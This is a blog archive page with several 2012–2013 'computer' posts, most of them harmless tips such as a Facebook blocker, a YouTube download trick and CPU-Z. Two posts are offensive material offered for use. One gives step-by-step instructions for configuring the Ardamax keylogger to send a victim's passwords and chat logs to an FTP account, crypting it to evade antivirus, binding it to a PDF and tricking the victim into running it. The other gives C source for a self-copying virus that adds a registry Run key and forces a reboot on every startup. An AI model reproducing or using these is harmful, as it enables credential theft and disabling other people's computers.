Showing posts with label computer. Show all posts
Showing posts with label computer. Show all posts

Monday, 25 March 2013

Block Facebook from Your Computer (Easiest WaY)



Facebook Blocker program such as the name says, is used to block the use of social network facebook.com. Essence of developing this program was to make parents in a very simple way deny the use of Facebook to their children , not just parents, but to someone else and you, of course program includes the option to unblock it but only with this application, of course if that user does not know that this 
application changes windows host file.


Simple Guidelines:

1. Downland and Run the application as Administrator, no need to install.

2. The most important thing to do FIRST is to choose option 1 and press enter.

3. To block facebook press 2 now check it by pressing number 5 and press enter.

4. To recover facebook back press 3 and restart your browser then check if it  works,if it still does not work press F5 in the browser window to refresh.

Download :
FaceBook Blocker
Read more ...

Download YOUTUBE videos on your computer or mobile without any software




Hello Friends today i am going to tell you how you can download videos from youtube without using any software .You can download videos on your computer or mobile in which you feel comfortable.Usually we use softwares like youtube downloaders to download videos from youtube and they suck in the speed sometime.So today i will be telling you how you can download videos from youtube without usign any software.
Download YOUTUBE videos on your computer or mobile without any software


  • First of all go to Youtube video which you want to download.
  • The link of the youtube video will look something like this.http://www.youtube.com/watch?v=79JXmV3JCHU
  • Now just replace www. with ss and the link will look like below http://ssyoutube.com/watch?v=79JXmV3JCHU
  • Now go the url and you will be shown the options of download
  • Now choose the format of file shown there like 3gp,mp4 or anything you like.just click on the format and your download will start.

Read more ...

Sunday, 28 October 2012

How To Hack a Remote Computer Using Ardamax Keylogger



we Need : -
1. Ardamax keylogger  Download from Here

2. Ftp account - You can create a free ftp account from Here.


3. Crypter Software - To disable  antivirus detection .You can Downland Crypter Software from Here 



Procedure :-

1.After installing  Ardamax keylogger, select and right  click Ardamax keylogger icon from your tasks bar. Now select enter registration key , then put in the name and the serial number which you will get from the downloaded software folder


               
  2.  Now right click Ardamax keylogger icon and select  remote installation, click next two times check all  the boxes as shown then finally click next



3. Now click enable and enter a password so that no one can open the keylogger then click next  three times, check "send logs every " and set your time say 5 min , Then select delivery method as Ftp, finally click next




4. Now enter your ftp account details which you created earlier in my case in enter Ftp host -ftp.drivehq.com ,remote folder -/logs ,user - test, Finally click next




5.  Now check all the boxes and click next, set your time for capturing the screen shots, then click next, If you want you can also change the icon by selecting change icon as shown. Finally select next and click finish


6.  If you've done all the steps correctly, you should get a server file (keylogger file ) , But this server file can be easily detected by anti -viruses , So to bypass anti viruses we need to bind and crypt the file ,So to do this open your crypter software (which you downloaded earlier) Now select file 1 as the server file (key logger file which you created) and then select file 2 as any application, select a good application(select a PDF  file for best performance)finally click Crypt file, Now you will get a crypted server file ( key logger file ) which is FUD  ( I.e ) Fully undetectable by anti viruses 


                                                                          
7.  Now send the fully undetectable Server file(keylogger file ) to your victim via email or upload it to any site and ask the victim to download the file.Once the victim clicks the application .Ardamax keylogger will  automatically install and will send logs(containing facebook password email passwords ,chat logs ..etc) to
your ftp account .You can view your victims logs by going  to your ftp account  
Read more ...

Thursday, 25 October 2012

A Virus Program to Restart the Computer at Every Startup



Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.
For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with C languagethen it’s too easy to understand the logic behind the coding.
Here is the source code.
#include<stdio.h>
#include<dos.h>
#include<dir.h>
int found,drive_no;char buff[128];
void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;
case 2:
target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;
case 3:
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;
case 4:
target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;
default:
exit(0);
}
while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}
else
system(“shutdown -r -t 0″); //if the system is already infected then just give a command
to restart}
Read more ...

Saturday, 22 September 2012

How To Get Full Information About Computer


Sometime We Need Some Information About Our System But We Cant Find Which We Really Want. So Today I Will Give You One Software For Get Full Information About Our System(Computer).


Features Of This Software:-

Full Information About Processor
Caches Information
Motherboard Information
Graphics Information
BIOS Information
Full Information About Memory
SPD Information
We Got This All Information From This Software. .It's Name CPU-Z.



There Are Simple Steps To Install This Software Like Other Software.

Download :
Click Here
Read more ...

Saturday, 1 September 2012

Is your computer “male” or “female”?




To Check your Computer's Gender follow this :

1. Open Notepad

2. Type the following line in notepad:

CreateObject("SAPI.SpVoice").Speak"I love you."

3. Save file as computer_gender.vbs

4. Run the file.

If you hear a male voice, your pc is a boy

If you hear a female voice, your pc is a girl
Read more ...
Related Posts Plugin for WordPress, Blogger...